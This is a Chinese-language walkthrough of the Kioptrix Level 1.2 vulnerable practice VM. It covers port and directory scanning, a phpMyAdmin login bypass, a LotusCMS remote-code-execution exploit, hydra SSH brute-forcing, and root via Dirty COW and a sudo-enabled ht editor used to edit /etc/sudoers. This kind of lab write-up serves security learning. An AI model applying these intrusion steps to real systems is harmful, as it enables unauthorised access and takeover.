靶机介绍

靶机描述

It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.

After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost127.0.0.1 static3.cdn.ubi.com 192.168.1.102 kioptrix3.com Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

靶机地址

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

信息收集

获得靶机的 IP 地址:

1
2
3
4
5
6
7
8

nmap -sn 192.168.56.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 07:34 CST
Nmap scan report for 192.168.56.1
Host is up (0.00081s latency).
Nmap scan report for 192.168.56.112
Host is up (0.00061s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.31 seconds

靶机的地址为 192.168.56.112,扫描端口和服务:

1

sudo nmap -sC -sV -p- -T4 -O 192.168.56.112

结果如下:

nmap

只开放了 22 和 80,运行着 SSH 和 Apache,而且可以看到 Apache 上运行着 PHP,版本为 5.2.4,而操作系统很可能是 Ubuntu。有了前几天的积累,发现 SSH 服务一般除了特别低的版本存在严重的漏洞,高版本除了爆破似乎没有更好的办法,也可能是因为姿势水平不够。那么将从 Apache 入手。

首先使用 dirb 扫描一下目录:

1

dirb http://192.168.56.112

扫描的结果中有一下比较有意思的地方,等会着重关注:

phpmyadmin

phpmyadmin_login

在浏览器中打开 http://192.168.56.112,主页如下:

index

似乎主页说他们致力于安全,而且更换了新的 CMS 系统,博客中有更多的信息。有登陆页面,便直奔登陆页面:

login

Powered by:LotusCMS??应该是使用的框架名称。使用 searchsploit 搜索相关的 exp,得到以下的结果:

LotusCMS

漏洞利用

phpmyadmin

由之前信息收集阶段的结果可知 phpmyadmin 的版本为 2.11.3,搜索可知该版本存在"万能密码",使用 ‘localhost’@'@" 即可登陆。

phpadmin_enter

虽然进去了,但是只能看到 information_schema 这一个数据库,姿势不到位进行不下去只有放弃。

LotusCMS

根据之前搜索的结果,有一个远程代码执行的 exp,直接打开 Metasploit 进行利用:

Lotus_exp

OpenSSH 爆破

后来看别人的博客才发现还可以这样,以前发现 SSH 的服务只要没有版本导致的漏洞是直接放过的,爆破从来没有考虑过。靶机的博客中提到了他们的新员工 loneferret,直接当作 SSH 的用户名进行爆破,这里我使用 hydra 进行爆破,字典选用 seclists 带的 darkweb2017-top1000.txt

1

hydra -l loneferret -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt

hydra

果然爆破得出密码 —— starwars。使用 SSH 登录:

ssh_login

权限提升

查看刚才 LotusCMS 远程代码执行的到的 shell 的权限如下:

1
2
3
4

id & whoami

uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data

权限比较低,接下来进行提权。

内核提权

继续查看内核版本及操作系统的详细信息:

1
2
3
4
5
6

uname -r & cat /etc/*-release

2.6.24-24-server
DISTRIB_ID=Ubuntu
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"

既然如此,直接脏牛好了(太懒了):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

searchsploit dirty cow

---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                      | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                      | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)          | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)             | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)          | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                 | linux/local/40611.c
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------

这里我使用 40839.c,即修改 /etc/passwd,添加一个新的账号 firefart 且 UID 为 0。使用 meterpreter 上传代码,编译并运行。

lpe

最终 SSH 进去:

SSH

HT Editor 提权

之前直接内核提权是比较懒的办法,接着查看是否还有其他途径。使用 loneferret 账号 SSH 登陆进去,发现家下有一个文件,进行查看:

company_policy

一个查看文件的工具,为何要 sudo?继续执行以下命令查看具有 SUID 权限的命令:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

find / -perm -4000 2>/dev/null

/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su

果然有这个 ht。直接 cat 查看 /etc/sudoers 没有权限,那么就使用这个 ht 来查看。这里注意需要设置以下的环境变量才能打开:

1

export TERM=xterm

继续查看,ht 内按 F6 可以选择显示的模式,以文本形式显示。可见以下:

sudoers

ht 和 su 可以免密码 sudo 执行(免不免密码无所谓了,反正密码都爆破出来了)。sudo ht 基本可以修改任意文件,而 sudo su 直接能获取 root 权限。但试了一下执行不了 su

1
2
3

which su

/bin/su

Emmm,/etc/sudoers 里面的 su 路径错了,正好拿 ht 修改下,将 /usr 全部改成空格就 OK了。最终获取 root shell:

get_root

参考链接

  1. https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub